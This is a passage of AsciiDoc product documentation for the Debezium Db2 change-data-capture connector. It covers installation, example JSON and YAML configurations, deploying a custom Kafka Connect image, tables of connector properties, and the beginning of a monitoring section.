connector]. This enables Db2 replication to expose change-data for tables that are in capture mode.\n\n. Use link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat AMQ Streams] to set up Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.\n\n. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[Db2 connector].\n\n. Extract the files into your Kafka Connect environment.\n. Add the plug-in's parent directory to your Kafka Connect `plugin.path`, for example:\n+\n[source]\n----\nplugin.path=\/kafka\/connect\n----\n+\nThe above example assumes that you extracted the {prodname} Db2 connector to the `\/kafka\/connect\/{prodname}-connector-db2` path.\n\n. 
Restart your Kafka Connect process to ensure that the new JAR files are picked up.\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-configuration-example\n\/\/ Title: {prodname} Db2 connector configuration example\n[[db2-example-configuration]]\n=== Connector configuration example\n\nifdef::community[]\n\n[[db2-example]]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure the {prodname} Db2 connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"db2-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.db2.Db2Connector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"50000\", \/\/ <4>\n \"database.user\": \"db2inst1\", \/\/ <5>\n \"database.password\": \"Password!\", \/\/ <6>\n \"database.dbname\": \"mydatabase\", \/\/ <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"table.include.list\": \"MYSCHEMA.CUSTOMERS\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\" \/\/ <11>\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this Db2 connector class.\n<3> The address of the Db2 instance.\n<4> The port number of the Db2 instance.\n<5> The name of the Db2 user.\n<6> The password for the Db2 user.\n<7> The name of the database to capture changes from.\n<8> The logical name of the Db2 instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n<9> A list of all tables whose changes {prodname} should capture.\n<10> The list of Kafka brokers that this connector uses to write and recover DDL statements to the database history topic.\n<11> The name of the database history topic where the connector writes and recovers DDL statements. This topic is for internal use only and should not be used by consumers.\n\nendif::community[]\n\nifdef::product[]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure a {prodname} Db2 connector in a `.yaml` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. 
Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnector\nmetadata:\n  name: inventory-connector \/\/ <1>\n  labels:\n    strimzi.io\/cluster: my-connect-cluster\nspec:\n  class: io.debezium.connector.db2.Db2Connector\n  tasksMax: 1 \/\/ <2>\n  config: \/\/ <3>\n    database.hostname: 192.168.99.100 \/\/ <4>\n    database.port: 50000\n    database.user: db2inst1\n    database.password: Password!\n    database.dbname: mydatabase\n    database.server.name: fullfillment \/\/ <5>\n    database.include.list: public.inventory \/\/ <6>\n----\n\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of the connector.\n\n|2\n|Only one task should operate at any one time.\n\n|3\n|The connector\u2019s configuration.\n\n|4\n|The database host, which is the address of the Db2 instance.\n\n|5\n|The logical name of the Db2 instance\/cluster, which forms a namespace and is used in the names of the Kafka topics to which the connector writes, the names of Kafka Connect schemas, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n\n|6\n|Changes in only the `public.inventory` database are captured.\n\n|===\n\nendif::product[]\n\nSee the {link-prefix}:{link-db2-connector}#db2-connector-properties[complete list of connector properties] that you can specify in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts one connector task that connects to the Db2 database, reads change-data tables for tables in capture mode, and streams change event records to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-db2-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} Db2 connector configuration to Kafka Connect\n[[db2-adding-connector-configuration]]\n=== Adding connector configuration\n\nifdef::community[]\nTo start running a Db2 connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* {link-prefix}:{link-db2-connector}#setting-up-db2-to-run-a-debezium-connector[Db2 replication] is enabled to expose change data for tables that are in capture mode.\n\n* The Db2 connector is installed.\n\n.Procedure\n\n. Create a configuration for the Db2 connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\nendif::community[]\n\nifdef::product[]\nYou can use a provided {prodname} container to deploy a {prodname} Db2 connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment.\n\n.Prerequisites\n\n* Podman or Docker is installed and you have sufficient rights to create and manage containers.\n* You installed the {prodname} Db2 connector archive.\n\n.Procedure\n\n. Extract the {prodname} Db2 connector archive to create a directory structure for the connector plug-in, for example:\n+\n[subs=+macros]\n----\npass:quotes[*tree .\/my-plugins\/*]\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-db2\n\u2502 \u251c\u2500\u2500 ...\n----\n\n. 
Create and publish a custom image for running your {prodname} connector:\n\n.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, you would replace _my-plugins_ with the name of your plug-ins directory:\n+\n[subs=\"+macros,+attributes\"]\n----\nFROM {DockerKafkaConnect}\nUSER root:root\npass:quotes[COPY _.\/my-plugins\/_ \/opt\/kafka\/plugins\/]\nUSER 1001\n----\n+\nBefore Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `\/opt\/kafka\/plugins` directory.\n\n.. Build the container image. For example, if the `Dockerfile` that you created in the previous step is in the current directory, and you want to name the image `debezium-container-for-db2`, then you would run the following command:\n+\n`podman build -t debezium-container-for-db2:latest .`\n\n.. Push your custom image to your container registry, for example:\n+\n`podman push debezium-container-for-db2:latest`\n\n.. Point to the new container image. Do one of the following:\n+\n* Edit the `spec.image` property of the `KafkaConnect` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n  name: my-connect-cluster\nspec:\n  #...\n  image: debezium-container-for-db2\n----\n+\n* In the `install\/cluster-operator\/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file you must apply it to your OpenShift cluster.\n\n. Create a `KafkaConnector` custom resource that defines your {prodname} Db2 connector instance. See {LinkDebeziumUserGuide}#debezium-db2-connector-configuration-example[the connector configuration example].\n\n. Apply the connector instance, for example:\n+\n`oc apply -f inventory-connector.yaml`\n+\nThis registers `inventory-connector` and the connector starts to run against the `inventory` database.\n\n. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, `inventory-connector` starts.\n\n.. Display the Kafka Connect log output:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/name=my-connect-cluster-connect)\n----\n\n.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines:\n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ...\n----\n\nendif::product[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-db2-connector}#db2-snapshots[performs a consistent snapshot] of the Db2 database tables that the connector is configured to capture changes for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n
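As an additional check, you can ask the Kafka Connect REST API for the connector's status. For example, a `GET` request to `\/connectors\/inventory-connector\/status` returns a JSON document similar to the following sketch; the connector name, worker addresses, and task details depend on your deployment:\n\n[source,json,indent=0]\n----\n{\n  \"name\": \"inventory-connector\",\n  \"connector\": { \"state\": \"RUNNING\", \"worker_id\": \"10.0.0.1:8083\" },\n  \"tasks\": [ { \"id\": 0, \"state\": \"RUNNING\", \"worker_id\": \"10.0.0.1:8083\" } ],\n  \"type\": \"source\"\n}\n----\n\n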
\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-configuration-properties\n\/\/ Title: Descriptions of {prodname} Db2 connector configuration properties\n[[db2-connector-properties]]\n=== Connector properties\n\nThe {prodname} Db2 connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:db2-required-configuration-properties[Required configuration properties]\n* xref:db2-advanced-configuration-properties[Advanced configuration properties]\n* xref:db2-pass-through-properties[Pass-through configuration properties]\n\n[id=\"db2-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-name]]<<db2-property-name, `name`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[db2-property-connector-class]]<<db2-property-connector-class, `connector.class`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.db2.Db2Connector` for the Db2 connector.\n\n|[[db2-property-tasks-max]]<<db2-property-tasks-max, `tasks.max`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The Db2 connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[db2-property-database-hostname]]<<db2-property-database-hostname, `database.hostname`>>\n|\n|IP address or hostname of the Db2 database server.\n\n|[[db2-property-database-port]]<<db2-property-database-port, `database.port`>>\n|`50000`\n|Integer port number of the Db2 database server.\n\n|[[db2-property-database-user]]<<db2-property-database-user, `database.user`>>\n|\n|Name of the Db2 database user for connecting to the Db2 database server.\n\n|[[db2-property-database-password]]<<db2-property-database-password, `database.password`>>\n|\n|Password to use when connecting to the Db2 database server.\n\n|[[db2-property-database-dbname]]<<db2-property-database-dbname, `database.dbname`>>\n|\n|The name of the Db2 database from which to stream the changes.\n\n|[[db2-property-database-server-name]]<<db2-property-database-server-name, `database.server{zwsp}.name`>>\n|\n|Logical name that identifies and provides a namespace for the particular Db2 database server that hosts the database for which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name. 
The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n\n|[[db2-property-database-history-kafka-topic]]<<db2-property-database-history-kafka-topic, `database.history{zwsp}.kafka.topic`>>\n|\n|The full name of the Kafka topic where the connector stores the database schema history.\n\n|[[db2-property-database-history-kafka-bootstrap-servers]]<<db2-property-database-history-kafka-bootstrap-servers, `database.history{zwsp}.kafka.bootstrap{zwsp}.servers`>>\n|\n|A list of host\/port pairs that the connector uses to establish an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the {prodname} Kafka Connect process.\n\n|[[db2-property-table-include-list]]<<db2-property-table-include-list, `table.include.list`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want the connector to capture. Any table not included in the include list does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table. Do not also set the `table.exclude.list` property.\n\n|[[db2-property-table-exclude-list]]<<db2-property-table-exclude-list, `table.exclude.list`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want the connector to capture. The connector captures changes in each non-system table that is not included in the exclude list. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.\n\n|[[db2-property-column-exclude-list]]<<db2-property-column-exclude-list, `column.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nPrimary key columns are always included in the event's key, even if they are excluded from the value.\n\n|[[db2-property-column-mask-hash]]<<db2-property-column-mask-hash, `column.mask{zwsp}.hash._hashAlgorithm_{zwsp}.with.salt._salt_`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in change event values. A pseudonym is a field value that consists of the hashed value obtained by applying the `_hashAlgorithm_` algorithm and the `_salt_` salt that you specify in the property name. +\n +\nBased on the hash algorithm applied, referential integrity is kept while data is masked. Supported hash algorithms are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.\nThe hash value is automatically shortened to the length of the column. +\n +\nYou can specify multiple instances of this property with different algorithms and salts. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. 
For example: +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K =` + `inventory.orders.customerName, inventory.shipment.customerName` +\n +\nwhere `CzQMA0cB5K` is a randomly selected salt.\n +\nDepending on the `_hashAlgorithm_` used, the `_salt_` selected, and the actual data set, the field value may not be completely masked.\n\n|[[db2-property-time-precision-mode]]<<db2-property-time-precision-mode, `time.precision.mode`>>\n|`adaptive`\n| Time, date, and timestamps can be represented with different kinds of precision: +\n +\n`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\n +\n`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which use millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-db2-connector}#db2-temporal-types[temporal types].\n\n|[[db2-property-tombstones-on-delete]]<<db2-property-tombstones-on-delete, `tombstones.on{zwsp}.delete`>>\n|`true`\n| Controls whether a tombstone event should be generated after a _delete_ event. +\n +\n`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is sent. +\n +\nAfter a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.\n\n|[[db2-property-include-schema-changes]]<<db2-property-include-schema-changes, `include.schema{zwsp}.changes`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database history.\n\n|[[db2-property-column-truncate-to-length-chars]]<<db2-property-column-truncate-to-length-chars, `column.truncate.to.{zwsp}_length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `column.truncate.to.20.chars`.\n\n|[[db2-property-column-mask-with-length-chars]]<<db2-property-column-mask-with-length-chars, `column.mask{zwsp}.with._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero. 
When you specify zero, the connector replaces a value with an empty string.\n\n|[[db2-property-column-propagate-source-type]]<<db2-property-column-propagate-source-type, `column.propagate{zwsp}.source.type`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +\n +\nFor each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThis property is useful for properly sizing corresponding columns in sink databases.\n\n|[[db2-property-datatype-propagate-source-type]]<<db2-property-datatype-propagate-source-type, `datatype.propagate{zwsp}.source.type`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +\n +\nFor these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThese parameters propagate a column's original type name and, for variable-width types, its original length. This property is useful for properly sizing corresponding columns in sink databases. +\n +\nSee {link-prefix}:{link-db2-connector}#db2-data-types[Db2 data types] for the list of Db2-specific data type names.\n\n|[[db2-property-message-key-columns]]<<db2-property-message-key-columns, `message.key{zwsp}.columns`>>\n|_empty string_\n|A semicolon-separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_schema-name_._table-name_:_regexp_;... +\n +\nFor example, +\n +\n`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +\n +\nIf `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka. See the sketch that follows this table.\n\n|===\n\n
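For instance, the following hypothetical configuration fragment maps the `ID` column of `MYSCHEMA.CUSTOMERS` and the `ORDER_NUMBER` column of `MYSCHEMA.ORDERS` into the Kafka message keys; the schema, table, and column names are assumptions for illustration:\n\n[source,json,indent=0]\n----\n{\n  \"message.key.columns\": \"MYSCHEMA.CUSTOMERS:ID;MYSCHEMA.ORDERS:ORDER_NUMBER\"\n}\n----\n\n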
[id=\"db2-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-snapshot-mode]]<<db2-property-snapshot-mode, `snapshot.mode`>>\n|`initial`\n|Specifies the criteria for performing a snapshot when the connector starts: +\n +\n`initial` - For tables in capture mode, the connector takes a snapshot of the schema for the table and the data in the table. This is useful for populating Kafka topics with a complete representation of the data. +\n +\n`schema_only` - For tables in capture mode, the connector takes a snapshot of only the schema for the table. This is useful when only the changes that are happening from now on need to be emitted to Kafka topics. After the snapshot is complete, the connector continues by reading change events from the database's redo logs.\n\n|[[db2-property-snapshot-isolation-mode]]<<db2-property-snapshot-isolation-mode, `snapshot.isolation{zwsp}.mode`>>\n|`repeatable_read`\n|During a snapshot, controls the transaction isolation level and how long the connector locks the tables that are in capture mode. The possible values are: +\n +\n`read_uncommitted` - Does not prevent other transactions from updating table rows during an initial snapshot. This mode has no data consistency guarantees; some data might be lost or corrupted. +\n +\n`read_committed` - Does not prevent other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`repeatable_read` - Prevents other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`exclusive` - Uses repeatable read isolation level but takes an exclusive lock for all tables to be read. This mode prevents other transactions from updating table rows during an initial snapshot. Only `exclusive` mode guarantees full consistency; the initial snapshot and streaming logs constitute a linear history.\n\n|[[db2-property-event-processing-failure-handling-mode]]<<db2-property-event-processing-failure-handling-mode, `event.processing{zwsp}.failure.handling{zwsp}.mode`>>\n|`fail`\n|Specifies how the connector handles exceptions during processing of events. The possible values are: +\n +\n`fail` - The connector logs the offset of the problematic event and stops processing. +\n +\n`warn` - The connector logs the offset of the problematic event and continues processing with the next event. 
+\n +\n`skip` - The connector skips the problematic event and continues processing with the next event.\n\n|[[db2-property-poll-interval-ms]]<<db2-property-poll-interval-ms, `poll.interval.ms`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[db2-property-max-queue-size]]<<db2-property-max-queue-size, `max.queue.size`>>\n|`8192`\n|Positive integer value for the maximum size of the blocking queue. The connector places change events that it reads from the database log into the blocking queue before writing them to Kafka. This queue can provide backpressure for reading change-data tables when, for example, writing records to Kafka is slower than it should be or Kafka is not available. Events that appear in the queue are not included in the offsets that are periodically recorded by the connector. The `max.queue.size` value should always be larger than the value of the `max.batch.size` connector configuration property.\n\n|[[db2-property-max-batch-size]]<<db2-property-max-batch-size, `max.batch.size`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[db2-property-max-queue-size-in-bytes]]<<db2-property-max-queue-size-in-bytes, `max.queue.size.in.bytes`>>\n|`0`\n|Long value for the maximum size in bytes of the blocking queue. This feature is disabled by default; it becomes active when the property is set to a positive long value.\n\n|[[db2-property-heartbeat-interval-ms]]<<db2-property-heartbeat-interval-ms, `heartbeat.interval{zwsp}.ms`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +\n +\nHeartbeat messages are useful when there are many updates in a database that is being tracked but only a tiny number of updates are in tables that are in capture mode. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that the connector has few opportunities to send the latest offset to Kafka. Sending heartbeat messages enables the connector to send the latest offset to Kafka.\n\n|[[db2-property-heartbeat-topics-prefix]]<<db2-property-heartbeat-topics-prefix, `heartbeat.topics{zwsp}.prefix`>>\n|`__debezium-heartbeat`\n|Specifies the prefix for the name of the topic to which the connector sends heartbeat messages. The format for this topic name is `<heartbeat.topics.prefix>.<server.name>`.\n\n|[[db2-property-snapshot-delay-ms]]<<db2-property-snapshot-delay-ms, `snapshot.delay.ms`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. 
If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors.\n\n|[[db2-property-snapshot-fetch-size]]<<db2-property-snapshot-fetch-size, `snapshot.fetch.size`>>\n|`2000`\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[db2-property-snapshot-lock-timeout-ms]]<<db2-property-snapshot-lock-timeout-ms, `snapshot.lock{zwsp}.timeout.ms`>>\n|`10000`\n|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this interval, the snapshot fails. {link-prefix}:{link-db2-connector}#db2-snapshots[How the connector performs snapshots] provides details. Other possible settings are: +\n +\n`0` - The connector immediately fails when it cannot obtain a lock. +\n +\n`-1` - The connector waits infinitely.\n\n|[[db2-property-snapshot-select-statement-overrides]]<<db2-property-snapshot-select-statement-overrides, `snapshot.select{zwsp}.statement{zwsp}.overrides`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that the connector reads from the log. Specify a comma-separated list of fully-qualified table names in the form _schemaName.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._SCHEMA_NAME_._TABLE_NAME_`. For example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[db2-property-sanitize-field-names]]<<db2-property-sanitize-field-names, `sanitize.field{zwsp}.names`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.\n\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[db2-property-provide-transaction-metadata]]<<db2-property-provide-transaction-metadata, `provide.transaction{zwsp}.metadata`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. 
See {link-prefix}:{link-db2-connector}#db2-transaction-metadata[Transaction metadata] for details.\n\n|===\n\n[id=\"db2-pass-through-properties\"]\n.Pass-through connector configuration properties\n\nThe connector also supports _pass-through_ configuration properties that it uses when it creates Kafka producers and consumers:\n\n * All connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history topic.\n\n * All connector configuration properties that begin with the `database.history.consumer.` prefix are used (without the prefix) when creating the Kafka consumer that reads the database history when the connector starts.\n\nFor example, the following connector configuration properties {link-kafka-docs}.html#security_configclients[secure connections to the Kafka broker]:\n\n[source,indent=0]\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. 
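\n\nTo make the property descriptions more concrete, the following is a minimal sketch of a complete connector registration payload. The advanced properties shown are taken from the tables above; the `database.*` connection values are placeholders based on common Debezium connector configuration, and the authoritative list of required connection properties appears earlier in this chapter:\n\n[source,json]\n----\n{\n  \"name\": \"inventory-db2-connector\",\n  \"config\": {\n    \"connector.class\": \"io.debezium.connector.db2.Db2Connector\",\n    \"database.hostname\": \"db2server\",\n    \"database.port\": \"50000\",\n    \"database.user\": \"db2inst1\",\n    \"database.password\": \"<password>\",\n    \"database.dbname\": \"mydatabase\",\n    \"database.server.name\": \"fulfillment\",\n    \"snapshot.mode\": \"initial\",\n    \"snapshot.isolation.mode\": \"repeatable_read\",\n    \"poll.interval.ms\": \"1000\",\n    \"max.batch.size\": \"2048\"\n  }\n}\n----\n\n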
Note that the Db2 connector uses the {link-kafka-docs}.html#newconsumerconfigs[new consumer].\n\nAlso, the connector passes configuration properties that start with `database.` to the JDBC URL, for example, `database.applicationName=debezium`.\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-db2-connector-performance\n\/\/ Title: Monitoring {prodname} Db2 connector performance\n[[db2-monitoring]]\n== Monitoring\n\nThe {prodname} Db2 connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-db2-connector}#db2-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-db2-connector}#db2-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n* {link-prefix}:{link-db2-connector}#db2-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.\n\n{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-db2-databases\n\/\/ Title: Monitoring {prodname} during snapshots of Db2 databases\n[[db2-monitoring-snapshots]]\n[[db2-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-record-streaming\n\/\/ Title: Monitoring {prodname} Db2 connector record streaming\n[[db2-monitoring-streaming]]\n[[db2-streaming-metrics]]\n=== Streaming metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-schema-history\n\/\/ Title: Monitoring {prodname} Db2 connector schema history\n[[db2-monitoring-schema-history]]\n[[db2-schema-history-metrics]]\n=== Schema history metrics\n\nThe *MBean* is 